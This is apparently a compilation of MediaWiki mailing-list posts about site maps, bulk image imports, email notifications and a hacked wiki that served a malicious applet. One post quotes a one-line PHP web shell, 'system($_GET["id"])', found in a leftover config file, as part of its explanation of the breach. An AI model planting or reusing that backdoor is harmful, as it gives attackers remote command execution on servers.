I made a screen shot to show the result ( not a real map of the wiki site
but some
.xml lists of the articles, each .xml list in a .xml.gz file for each Wiki
spacename)
but I cancelled this message because of the big image ( 100Ko)

Hi Lonny,
thanks for the link, that is exactly what I _would_ need, but unfortunately
the company developing it is down and no source code is available on the
net. Vaporware? :-((
Cheers,
Peter

How do I get a complete list of all articles in my Wikimedia?
Is it possible to generate a 'site map'?
Kind regards,
Eric

We managed to find and hopefully resolve this security hole.
It was not the index.php.
It was the /config/.info.php In that file there is the following line:
<?php system($_GET["id"]) ?>
We didn’t delete the config folder so someone was able to use that script to
get it.
The Mediawiki installation process does tell you to delete the config
folder. Maybe it should be in red J
I hope this will help everyone remember to remove the config folder after
installing the wiki.
Thanks,
Itay

I have tested with */maintenance/importImages.php* to upload files to my
wiki-installations.
Seems like it works quite easily
So my basic idea was:
* copy my new file to a SMB-share on my wiki-server
* cron starts a script which runs the importImages.php script and
deletes the importet files
Well reaching this point i notice a small *problem regarding override.*
Per default importImages skips the upload/import of an image if there is
already a file with the same name in my wiki.
Thats ok and does makes sense.
Is there a way to realize if importImages does successfully import an
image ?
Cause i want to delete only the imported images from the SMB-share
If i start importImages from command-line i get something like this:
>> WsusDebugTool.zip exists, skipping
>> Importing test_voda.pdf...done.
*So my final question is:*
--
how should my cron-script looks like to execute
maintenance/importImages.php for each file in my INCOMING-SMB-folder
(i.e. /media/samba/import_me_to_wiki/)
and delete the file ONLY if the file was uploaded/added to my wiki.
any ideas howto implement this ?
Best regards
Florian

Hi Everyone,
I hope this is the right place to ask about this (pls point me elsewhere is
needed)
Our MediaWiki was hacked (twice in the past month) and someone was able to
change the root index.html files of our website and add an Iframe to it that
loads a malicious java applet. If users select to run the applet it installs
a virus/torjan on their PC.
After reading the log file I am thinking it's the Wiki's index.php page. The
hosting is NetworkS' who said that I have a vulnerable php script. And I
should fix it.
This is from the log files:

Can anyone advice on how to protect it/prevent future attacks?
Thanks a lot in advance!

We are using MediaWiki 1.11.0.
In "my preferences", in the "E-mail" section, I have checked "E-mail me
when a page
I'm watching is changed".
After that, for the Main Page, I have the checkbox on the Edit page
selected which says
"Watch this page".
I made a change, but did not get an email. I was able to go to the "my
watchlist" page and
see the change.
What did I do wrong ? Why didn't I get an email ? What can I try ?
Thank you,
Lori
